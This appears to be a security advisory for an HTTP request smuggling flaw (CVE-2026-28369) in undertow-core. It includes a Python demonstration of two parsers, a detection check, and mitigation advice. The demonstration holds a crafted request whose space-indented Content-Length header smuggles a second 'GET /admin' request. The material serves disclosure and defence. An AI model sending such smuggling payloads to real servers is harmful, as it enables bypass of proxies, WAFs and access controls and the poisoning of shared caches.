
AIKIDO-2026-10534

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVE-2026-28369
Published Apr 24, 2026

Score: 87 (High Risk)

This Affects:

Java: undertow-core
Versions 0.0.1 - 2.3.24.Final

TL;DR

A flaw was found in Undertow where an HTTP request whose first header line starts with one or more spaces is processed by stripping the leading whitespace and treating the line as an ordinary header. RFC 9112 (section 2.2) requires a recipient to either reject such a message or consume each whitespace-preceded line without processing it, so an Undertow instance and a front-end proxy, load balancer, WAF or cache that follows the RFC can disagree on which headers the request carries, and in particular on the Content-Length or Transfer-Encoding value that decides where the request body ends. A remote attacker can use this discrepancy to perform HTTP request smuggling, allowing them to bypass security mechanisms, manipulate web caches, or access restricted information.
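The discrepancy above, as an added example that is not code from Undertow or from this advisory: two deliberately simplified HTTP/1.1 request parsers, one that strips the leading whitespace from the first header line and honours it (modelling the behaviour described for the vulnerable versions), and one that follows RFC 9112 and consumes whitespace-preceded lines after the request line without parsing them. The request bytes, the parser functions and the check are constructed for this illustration; they are not Undertow's parser and do not reproduce its exact code paths.

```python
"""Parser-differential demonstration for the leading-whitespace header flaw.

Added example, not code from Undertow or Aikido. It models two simplified
HTTP/1.1 request parsers:

  lenient_parse - strips leading whitespace from the first header line and
                  parses it as a normal header (the behaviour the advisory
                  describes for undertow-core 0.0.1 - 2.3.24.Final)
  strict_parse  - RFC 9112 section 2.2: whitespace-preceded lines directly
                  after the request line are consumed without being parsed

The request bytes below are constructed for illustration; the parsers are
assumptions written for this example, not Undertow's parser.
"""
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    target: str
    version: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""
    leftover: bytes = b""   # bytes after the body: what a parser sees as the next request


def _split_head(raw: bytes) -> tuple:
    """Split the head from the body at the first CRLF CRLF."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    return head.decode("latin-1").split("\r\n"), rest


def _parse_header(line: str, headers: dict) -> None:
    """Parse 'Name: value'; whitespace in or around the name is malformed."""
    name, sep, value = line.partition(":")
    if not sep or not name or name != name.strip():
        raise ValueError(f"malformed header line: {line!r}")
    headers[name.lower()] = value.strip()


def _finish(req: Request, rest: bytes) -> Request:
    """Frame the body with Content-Length (chunked framing is out of scope here)."""
    length = int(req.headers.get("content-length", "0"))
    req.body, req.leftover = rest[:length], rest[length:]
    return req


def lenient_parse(raw: bytes) -> Request:
    """Vulnerable model: leading SP/HTAB on the first header line is dropped."""
    lines, rest = _split_head(raw)
    req = Request(*lines[0].split(" ", 2))
    for i, line in enumerate(lines[1:]):
        if i == 0:
            line = line.lstrip(" \t")   # the stripping the advisory describes
        _parse_header(line, req.headers)
    return _finish(req, rest)


def strict_parse(raw: bytes) -> Request:
    """RFC 9112 model: whitespace-preceded lines after the request line are ignored."""
    lines, rest = _split_head(raw)
    req = Request(*lines[0].split(" ", 2))
    header_lines = lines[1:]
    while header_lines and header_lines[0][:1] in (" ", "\t"):
        header_lines.pop(0)             # consumed without further processing
    for line in header_lines:
        _parse_header(line, req.headers)
    return _finish(req, rest)


def parsers_disagree(raw: bytes) -> bool:
    """True when the two parsers frame the request differently (the smuggling precondition)."""
    a, b = lenient_parse(raw), strict_parse(raw)
    return (a.headers, a.body, a.leftover) != (b.headers, b.body, b.leftover)


def has_whitespace_before_first_header(raw: bytes) -> bool:
    """Check a front-end proxy or WAF can apply to reject such requests outright."""
    lines, _ = _split_head(raw)
    return len(lines) > 1 and lines[1][:1] in (" ", "\t")


# Constructed input: the smuggled Content-Length is only visible to the lenient parser.
SMUGGLE = (
    b"POST /api HTTP/1.1\r\n"
    b" Content-Length: 5\r\n"
    b"Host: example.test\r\n"
    b"\r\n"
    b"HELLOGET /admin HTTP/1.1\r\n\r\n"
)
NORMAL = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for name, parse in (("lenient", lenient_parse), ("strict", strict_parse)):
        r = parse(SMUGGLE)
        print(f"{name:8} headers={r.headers} body={r.body!r} leftover={r.leftover!r}")
    print("disagree:", parsers_disagree(SMUGGLE), "| reject:", has_whitespace_before_first_header(SMUGGLE))
```

On the constructed request the lenient parser honours the indented Content-Length, takes `HELLO` as the body and leaves `GET /admin ...` as a second request, while the strict parser sees no Content-Length, an empty body and the whole tail as the next request. That disagreement about where one request ends and the next begins is what request smuggling exploits; `has_whitespace_before_first_header` is the kind of check a front end can apply to refuse such requests before they reach the affected server.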

Who does this affect?

You are affected if your application uses undertow-core in the vulnerable range (0.0.1 through 2.3.24.Final), whether as a direct dependency or transitively through a server or framework that bundles it. The exposure is greatest when Undertow sits behind a reverse proxy, load balancer, WAF or CDN that parses incoming requests differently, since the smuggling attack depends on the two components disagreeing about the request.

Background info

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in versions 0.0.1 - 2.3.24.Final.

How to fix this

There is no fix available yet, but there are PRs ready to merge and the fix will probably be released in version 2.4.0. Until an upgraded release is available, an interim mitigation is to have the front-end proxy or WAF reject requests in which the line following the request line begins with a space or tab. Note that a front end which merely drops such lines (the other behaviour RFC 9112 permits) does not close the gap, because Undertow will still honour them; rejecting the request is what removes the discrepancy.